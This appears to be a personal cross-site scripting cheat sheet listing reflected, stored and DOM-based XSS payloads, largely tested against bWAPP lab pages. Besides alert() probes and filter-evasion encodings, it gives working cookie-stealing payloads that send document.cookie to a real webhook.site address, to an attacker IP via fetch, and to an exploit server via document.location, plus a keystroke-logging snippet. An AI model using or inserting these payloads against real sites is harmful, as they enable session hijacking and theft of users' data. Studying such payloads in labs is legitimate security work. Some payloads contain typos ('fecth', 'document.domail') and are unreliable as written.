OFFENSIVE | DEFENSIVE | WIKI | ABOUT

<<



GENERAL TECHNIQUES
C1: <script>var i = new Image;i.src="LISTENER URL/?"+document.cookie;</script>

SAMPLE: <script>var i = new Image;i.src="https://webhook.site/#!/d88f22e7-9e44-47e8-9508-edeb3406d1cd/?"+document.cookie;</script>

.C1.

NOTE:  Do not remove the /? symbols, they allow to use the "document.cookie" as parameter. 

CASE_1: Sometimes some characters are not allowed and encode techniques are needed, JS accepts decimal unicode characters. If it is still 
failing [HTTP 403 "maybe"] a quick change is to add zeros to the encoded value, JS will interpret the value as it is. 

SAMPLE: Let's say, the character ( is not allowed, the decimal unicode value is &#40, so adding extra zeros will look like the 
following:&#0000000040 
	
	

REFLECTED TECHNIQUES
DESCRIPTION: It is when data is retrieved in the webpage without any restriction. So it can be used to exfiltrate information, stole data, etc.

NOTE: 
	
-It is important to analyze if exist some code behind performing actions, check if you can analyze the syntax/format to close the query. 
The following sample is closing two sections of the query,  "}]}'; and </script>
-Try to add a new header, that will reflect if allows custom headers or not. | bWAPP: <script>alert(1)</script>

SAMPLE:

</script>var JSONResponseString = '{"movies":[{"response":"test??? Sorry, we don't have that movie :("}]}';

COMMON TESTS: 	
	
C1: <h1>TEST</h1>	
C2: <script>alert('XSS');</script> || C1 & C2, NORMAL TEST TO KNOW IF VULNERABILITY EXIST	

C3: <script>alert(document.cookie);</script> || NORMAL TEST TO RETRIEVE COOKIES

C4: <script>fecth('http://IP_ADDR/${btoa(document.cookie)}');</script> || STOLE ENCODED BASE64 COOKIE

C5: <script>confirm(document.domain);</script>	
		
*for this to work, it is needed a python server or any listener to retrieve the content.


.C1. | .C2.  | .C3.  | .C4. | .C5. 

::: INTO AN ATTRIBUTE

C1: "onmouseover="alert(1)

NOTE: As soon as you move the mouse over the vulnerable tag, it will pop-up the alert function. General inspection it's needed, manual 
review of behavior of input fields. If it is showing input data, how it behaves, what can he imported, etc.

.C1.

::: INTO AN JAVASCRIPT STRING

NOTE: Headers inspection is needed, [burpsuite > repeater]. Analyze the code and what it is doing, if it is receiving via parameters some 
payloads can be used to escape. 
	
C1: '-alert(1)-'

.C1.

::: INTO AJAX/XML

C1: <img src='#' onerror='alert(1)'>

.C1.

::: EVAL FUNCTION

SAMPLE: http://192.168.37.129/bWAPP/xss_eval.php?date=Date()

Here it will depends but is only needed to add a script tag into the Date() function. If security if broken, it will pop-up an alert. 

::: HREF

Here it will depends based on where the HREF is located, however, it is really important to analyze the syntax/format of the query, 
check if exist some way to close the query to append the XSS command. Also, the referer HTML tag is a good option to test. 
Check sample,

SAMPLE:

<td align="center"> <a href=xss_href-3.php?movie=1&name=TEST&action=vote>Vote</a></td>
	
ATTACK: http://192.168.37.129/bWAPP/xss_href-2.php?name=TEST><script>alert('XSS')</script>&action=vote 

If you check, the HREF is part of a column in a table as it is using the td HTML tag, you can confirm checking where is located 
the word TEST. So, here you can close the a href tag and append the script tag. This will do a XSS attempt, as the 
script HTML tag is added.  

::: SQLi to XSS

SAMPLE: ' or 1=1; <script>alert('TOME')</script>

::: XSS to CSRF

It can be reflected or stored.
			

TEST VIA DEV TOOLS
1. Open dev-tools in your browser > go to console.
2. Type: alert(1) | print() | prompt("hello")

.C1. | .C2. | .C3.

CREATE A LOG FUNCTION TO STORE/RETRIEVE DATA USING XSS

step1>$ function logKey(event){console.log(event.key)}

.C1.

step2>$ document.addEventListener('keydown', logKey)

.C2.
	


STORED TECHNIQUES
DESCRIPTION: It is when data (exploit) is stored in the webpage without any restriction. So it can be used to exploit any user that loads 
the vulnerable page.

NOTE:
	
1. First thing, check if the site allows guest user post or any input post to be stored. 
2. Is there any "hidden" fields ? Check if the query can be closed.
3. Check cookies, confirm if there's no "Set-Cookie:" parameters.

::: INTO AN HREF ATTRIBUTE

1. Check how the application behaves when you are providing some input data. [always inspect headers]
2. href attribute can invoke javascript code.

SAMPLE: javascript:alert(1) 
	
.C1.	

::: EXTERNAL XSS
	
C2: <script>document.location='//EXPLOIT_SERVER_URL/'+document.cookie</script> 

.C2.	

NOTE: Payload can be used to retrieve the cookie from external sites. 



DOM TECHNIQUES

NORMAL TESTS
1. <img src=x onerror="prompt(1)">
2. <img src=x onerror="window.location.href="https://machetevault.github.io/machete"">
3. <svg onload=alert(1)> | DOM for document.write
4. <img src=1 onerror='alert(XSS)'> | DOM for innerHTML
5. <iframe onload=alert(document.domail)> | H1:1901706

.C1. | .C2. | .C3. | .C4. | .C5.
	
	
NOTE: 

Inspection of the code is needed 100%, right click > inspect. Look for javascript code that behaves with input information. 
HTML sinks will retrieve HTML content that with manual inspection you can discover that, however, JS sinks will behave differently, 
JS debugger is needed. 
	
::: HOW TO KNOW IF DOM-BASED VULNERABILITY EXIST ?

One way, is to use the application as expected and open dev tools and inspect the network tab, if there's requests coming and 
going it means it can be reflected or stored, if not, it could be the chance that it is DOM-BASED. check it! Take a look if exists 
javascript code that takes data from possible vulnerable sources. [innerHTML / eval()] = sink

SOURCE = Javascript properties that allows you to control input.

Types:
	
document.URL / document.documentURI / document.URLUnencoded / document.baseURI / window.location / document.cookie / 
document.referrer / window.name / history.pushState / history.replaceState / localStorage / sessionStorage
IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB) / Database / location
	
SINK = Potentially dangerous JavaScript function | [innerHTML / eval()]


DOM jQUERY SINKS
	
1. Inspect the webpage, first identify if exist JS, JQuery code and how it behaves.
2. Try to attempt different tests.

SAMPLE: javascript:alert(document.cookie)

value?vulnvalue=alert(document.cookie)

.C1.

	

DOM INSIDE "SELECT" STATEMENT
	
NOTE: It is needed to use the application as normal to later analyze the headers as it is really important to understand how it works. 
May exist some parameters that are hidden, etc. Test and looks how it behave. Inspect HTML code.

sink:document.write / source:location.search

C1: "></select><img%20src=1%20onerror=alert(1)>
	
.C1.

	

DOM IN ANGULAR JS
	

To be added...


REFLECTED DOM
	
NOTES: 
	
1. It is required to use the application as normal user and analyze headers, behavior, etc. 
2. It is required to analyze the JS code related to the application. 
3. Look for any sink with interesting behavior. 
4. Try to input different values when possible, with symbols, numbers, etc and check behavior/responses.

SAMPLE: Escaping "\"

C1: \"-alert(1)}//
	
.C1.

	

STORED DOM
	
NOTES: 

1. It is required to use the application as normal user and analyze headers, behavior, etc.
2. It is a comments section ? Accept guest input values ?
	
C1: <><img src=1 onerror=alert(1)>
	
.C1.



ENCODED PAYLOADS TECHNIQUES

<script <script>>alert('l33t')</script>

<img/src onerror=alert('l33t')>
	
<svg><script>alert('l33t')
	
<svg><script>alert&lpar;'l33t'&rpar;
	
<script>\u0061lert('l33t')</script>
	
<script>eval('\x61lert(\'l33t\')')</script>
	
[NL]eval('\x61lert(\'l33t\')'
	
<script>eval(8680439..toString(30))(983801..toString(36))</script>

<h1 onauxclick=confirm(document.domain)>RIGHT CLICK HERE || https://hackerone.com/reports/1779447
	
	

GO BACK